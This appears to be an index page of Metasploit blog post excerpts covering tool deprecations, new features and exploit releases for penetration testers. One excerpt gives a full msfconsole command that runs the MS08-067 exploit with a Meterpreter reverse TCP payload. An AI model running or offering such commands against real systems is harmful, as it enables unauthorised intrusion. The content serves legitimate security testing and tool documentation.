Msfcli is No Longer Available in Metasploit
Hi everyone,
This January, we made an announcement about the deprecation of Msfcli, the
command-line interface for Metasploit. Today we are ready to say good-bye to
it. Instead of Msfcli, we recommend using the -x option in Msfconsole. For
example, here's how you can run MS08-067 in one line:
./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"
You can also leverage things like resource scripts o
MsfPayload and MsfEncode are Being Removed from Metasploit
Oh hi folks,
Last year on December 9th
[https://www.rapid7.com/blog/post/2014/12/09/good-bye-msfpayload-and-msfencode/],
we made an official announcement about deprecating MsfPayload and MsfEncode.
They are being replaced by msfvenom. Well, today is the day we pull the plug. We
are currently in the process
[https://github.com/rapid7/metasploit-framework/pull/5509] of removing these two
utilities, and in a day or two you will never see them from upstream again.
If you are still not so familiar
Using Host Tagging in Metasploit for Penetration Testing
Hello my fellow hackers! Tag, you're it!
For today's blog post, I'd like to talk about host tagging a little bit in
Metasploit. If you are a penetration tester, a CTF player, or you just pop a lot
of shells like a rock star, then perhaps this will interest you. If you have
never used this kind of feature, then hopefully this blog post will bring you a
new idea on how to approach host management.
So what is host tagging? Well, the idea is simple really. It's a way to label
your targets and make
Haxmas
12 Days of HaXmas: Opening Up My Top Secret Metasploit Time Capsule
This post is the second in a series, 12 Days of HaXmas, where we take a look at
some of the more notable advancements and events in the Metasploit Framework
over the course of 2014.
For today's HaXmas amusement, I have something fun to share with you all. So the
other day I was watching this movie called The Knowing
[https://www.youtube.com/watch?v=ikJ3t_tZf-E], an action-thriller starring
Nicolas Cage. The story of this movie begins with a school teacher telling the
students that as part of the s
Metasploit
Good-bye msfpayload and msfencode
Greetings all,
On behalf of the Metasploit development team, I'd like to officially announce
the decision to deprecate msfpayload and msfencode. Also starting today, we no
longer support or accept patches for these two utilities. On June 8th 2015, the
elderly msfpayload and msfencode will retire from the Metasploit repository and
be replaced by their successor, msfvenom. The tool msfvenom is the combination of
msfpayload and msfencode, and has been in testing for more than 3.5 years.
msfpayl
Metasploit Weekly Update: Prison Break
Boy, that escalated quickly!
In this week's Metasploit [https://www.rapid7.com/products/metasploit/download/]
update, we'd like to introduce two sandbox-escape exploits for Internet
Explorer, and demonstrate how you're supposed to use them. The two we're
covering are MS13-097, an escape via Windows registry symlinks, and MS14-009,
which exploits a type traversal bug in the .Net Deployment Service. We will also
briefly go over other new modules and changes. Here we go.
Why You Need a S
Exploits
"Hack Away at the Unessential" with ExpLib2 in Metasploit
This blog post was jointly written by Wei sinn3r Chen
[https://twitter.com/_sinn3r] and Juan Vazquez [https://twitter.com/_juan_vazquez_]
Memory corruption exploitation is not how it used to be. With modern mitigations
in place, such as GS, SafeSEH, SEHOP, DEP, ASLR/FASLR, EAF+, ASR, VTable guards,
memory randomization, sealed optimization, etc., exploit development has
become much more complicated. It definitely shows when you see researchers
jumping through hoops like reverse-engineering
Metasploit
Weekly Metasploit Update: Encoding-Fu, New Powershell Payload, Bug Fixes
I Got 99 Problems but a Limited Charset Ain't One
In this week's Metasploit weekly update, we begin with OJ TheColonial Reeves'
[https://twitter.com/TheColonial] new optimized sub encoding module
(opt_sub.rb). As the name implies, this encoder takes advantage of the SUB
assembly instruction to encode a payload with printable characters that are file path
friendly. Encoders like this are incredibly useful for developing a memory
corruption exploit that triggers a file path buffer overflow, where
Let's Talk About Your Security Breach with Metasploit. Literally. In Real Time.
During a recent business trip in Boston, Tod [https://twitter.com/todb] and I
sat down in a bar with the rest of the Metasploit team, and shared our own
random alcohol-driven ideas on Metasploit hacking. At one point we started
talking about hacking webcams. At that time Metasploit could only list webcams,
take a snapshot, stream
[/2014/01/03/donut-vigilante-raided-and-arrested-at-metasploit] (without sound),
or record audio
[/2013/01/23/the-forgotten-spying-feature-metasploits-mic-recording-c
Pwn Faster with Metasploit's Multi-Host Check Command
One of the most popular requests I've received from professional penetration
testers is that they often need to be able to break into a network as fast as
possible, and as many as possible during an engagement. While Metasploit Pro or
even the community edition already gives you a significant advantage in speed
and efficiency, there is still quite a large group of hardcore Framework users
out there, so we do whatever we can to improve everybody's hacking experience. A
new trick we'd like to in
Metasploit Now Supports Malware Analysis via VirusTotal
VirusTotal is a free online service that allows you to analyze files or URLs in
order to identify malware detectable by antivirus engines, and is one of the
most popular ones in the community, so we decided to get a piece of that action.
As offensive tool developers, we often find ourselves testing the capabilities
of different AV products. There are usually two ways to achieve this, of course.
You either spend some money and build your own lab, or you spend nothing and
just use VirusTotal's API
12 Days of HaXmas: Impress Your Family With Elite Metasploit Wizardry
This post is the fourth in a series, 12 Days of HaXmas, where we take a look at
some of the more notable advancements in the Metasploit Framework over the
course of 2013.
Every year during a major holiday, we crawl out from our own bat cave and
actually spend time with our family and friends. People start asking you what
you do for a living. You respond with something you probably regret, like "I am
a penetration tester," because to an average person your job title probably
sounds no different than
Metasploit Releases CVE-2013-3893 (IE SetMouseCapture Use-After-Free)
Recently the public has shown a lot of interest in the new Internet Explorer
vulnerability (CVE-2013-3893
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893]) that has been
exploited in the wild, which was initially discovered in Japan. At the time of
this writing there is still no patch available, but there is still at least a
temporary fix-it that you can apply from Microsoft, which can be downloaded here
[http://technet.microsoft.com/en-us/security/advisory/2887505].
The nitt
New Heap Spray Technique for Metasploit Browser Exploitation
![](/content/images/post-images/14831/Screen shot 2013-03-01 at 10.33.14 AM.png#img-half-right)
Browser vulnerabilities have always been serious threats in today's security
trends. It's almost becoming too common to see people dropping browser 0days to
beef up botnets, or deploying them for "sophisticated" APT-level attacks, etc.
Although browser 0days surface more frequently than ever, some of the techniques
don't seem to change much. The most common trick you'll see is a heap spray
[https:/
Metasploit
The Forgotten Spying Feature: Metasploit's Mic Recording Command
About two years ago, Metasploit implemented
[https://github.com/rapid7/metasploit-framework/commit/2e72926638b0fb972a26b2c1a3b040cf4cc224f2]
the microphone recording feature to stdapi thanks to Matthew Weeks
[https://twitter.com/scriptjunkie1]. And then almost a year ago, we actually
lost that command
[https://github.com/rapid7/metasploit-framework/commit/42719ab34bb9ca51d2cd623777662fc2253857f1]
due to a typo. We, and apparently everyone else, never noticed that until I was
looking at th